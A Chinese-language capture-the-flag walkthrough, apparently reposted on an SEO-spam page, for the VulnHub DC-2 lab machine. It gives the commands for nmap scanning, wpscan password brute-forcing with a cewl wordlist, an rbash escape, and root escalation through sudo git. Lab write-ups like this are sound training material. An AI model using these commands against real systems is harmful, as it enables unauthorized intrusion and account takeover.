当前位置: 首页 > wzjs >正文

做自媒体网站开发seo投放营销

做自媒体网站开发,seo投放营销,物流网站建设实例,海口网站建设费用VulnHub-DC-2靶机渗透教程 1.靶机部署 [Onepanda] Mik1ysomething 靶机下载:https://download.vulnhub.com/dc/DC-2.zip 直接使用VMware导入打开就行 2.信息收集 2.1 获取靶机ip(arp-scan/nmap) arp-scan -l ​ nmap 192.168.135.0/24 2.2 详细信息扫描(nmap)…

VulnHub-DC-2靶机渗透教程

1.靶机部署

[Onepanda] Mik1ysomething

靶机下载:https://download.vulnhub.com/dc/DC-2.zip

直接使用VMware导入打开就行

2.信息收集

2.1 获取靶机ip(arp-scan/nmap)

arp-scan -l
​
nmap 192.168.135.0/24

2.2 详细信息扫描(nmap)

nmap -sS -T5 -sC -p- --min-rate 10000 192.168.135.136
nmap -sS -p---min-rate 10000 $ip

发现开放了80端口,访问一下看看

发现访问不了,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们更改hosts文件,添加一个ip域名指向。

添加之后,再次访问,访问成功发现是wordpress的站点

2.3 敏感目录扫描(dirsearch/dirb/gobuster/御剑/7bscan)

dirsearch -u http://192.168.135.136 -e *
dirb http://192.168.135.136

2.4 指纹收集(whatweb)

whatweb -v 192.168.135.136

3.渗透过程

flag1

在网页下面我们发现flag

点进去发现flag1

flag1的意思:大概就是尝试暴力破解,获取账号密码,使用用户登录吧

你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录。

前面信息收集时候发现后台地址:http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1

这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描进行用户枚举

Wpscan一些常用用法:
wpscan --url http://dc-2 获取版本信息4.7.10
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户 > admin/jerry/tom

根据flag1提示使用暴力破解,首先使用cewl命令行工具,对网站进行生成字典,保存到passwd.txt当中,然后使用wpscan爆破

cewl http://dc-2/ > password.txt
wpscan --url http://dc-2 --passwords password.txt

爆破出来两个账号

jerry/adipiscing
tom/parturient

flag2

使用爆破的用户名登录网站,两个账户都可以

这里有许多功能点,我们挨个点点,发现在pages下发现flag2

flag提示:简单点可能可以试试别的方式,比如ssh/ftp别的服务。

If you can't exploit WordPress and take a shortcut, there is another way.
如果你不能利用WordPress并采取一条捷径,还有另外一种方法。
Hope you found another entry point.
希望你找到了另一个入口。

flag3

这里还有另外一个tom用户可以尝试ssh连接,前面信息收集发现7744端口也是打开的。

jerry/adipiscing
tom/parturient
ssh tom@192.168.135.136 -p 7744

登录成功发现在tom的目录下发现flag3

但这里我尝试cat发现命令用不了,vim也不行,但是用vi/less可以

提示:可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。(su命令提示)

我们尝试切换到另外一个jerry用户发现没有su命令

另外也提示到我们需要rbash逃逸

查看一下可以使用的命令

echo $PATH

使用echo绕过rbash

BASH_CMDS[su]=/bin/sh;su
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
su jerry
输入前面爆破的密码

flag4

cd jerry
ls
cat flag4.txt

在jerry的目录下发现flag4

提示信息如下:

Good to see that you've made it this far - but you " re not home yet .
很高兴看到你走了这么远,但你还没回家。
You still need to get the final flag (the only flag that really counts!!! ).
您仍然需要获得最后的标志(唯一真正重要的标志!)
No hints here 一you're on your own now. :- )
这里没有暗示,一,你现在只能靠自己了。*-)
Go on
继续
git outta here!!!!

最后肯定是需要提权获取到最后一个flag,提示到git,可能是需要git提权。

flag5

sudo -l

发现jerry无需root权限执行git

查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null

这里sudo/su都需要root权限,我们这里只能使用git命令,并使用git命令提权

sudo git branch --help config
​
sudo git branch --help status
​
!/bin/sh

提权成功

发现最后一个flag

cd /root
​
ls
​
cat final-flag.txt

本篇文章渗透结束 感谢大家的观看!!

http://www.dtcms.com/wzjs/69548.html

相关文章:

  • 英文网站建设580dw网页制作详细步骤
  • 免费流程图制作网站网络营销渠道策略
  • 赣州做网站的公司有哪家好网络策划与营销
  • 河南自助建站seo公司搜索引擎优化的简称是
  • 郑州市惠济区城乡建设局网站好口碑关键词优化
  • 阿里云企业网站怎么收费seo职位具体做什么
  • 门户网站建设招投标北京网站推广服务
  • win10系统做网站厦门seo关键词优化代运营
  • 权威网站优化价格搜索引擎seo推广
  • 网站开发售后服务协议策划营销
  • 途牛的旅游网站是谁做的盐城seo推广
  • 建e网站官网案例北京网站建设公司
  • 网站建设哪家信誉好seo教程视频
  • 雄安网站建设需要多少钱福州网站seo优化公司
  • 做任务换流量的网站自己有网站怎么推广
  • 无锡建设网站制作网址seo查询
  • 深圳罗湖企业网站推广友链出售
  • 微信小程序怎么做商城网站seo招聘
  • 百度怎样做网站并宣传网站网站外链购买
  • 免费人物素材网站昆山网站建设公司
  • wap自助建论坛网站推广网站的方法有哪些
  • cms企业网站源码成都seo经理
  • 服务行业网站建设google浏览器网页版
  • 成都网站建设赢展seo网站快速排名
  • 案例网站有哪些江苏疫情最新消息
  • 做网站后台的电子文库百度热线电话
  • 企业网站建设公司排名定制网站开发公司
  • 护肤品网站建设的意义鹤壁网络推广哪家好
  • wordpress去标题版权搜索优化师
  • 医院网站建设预算站长工具百科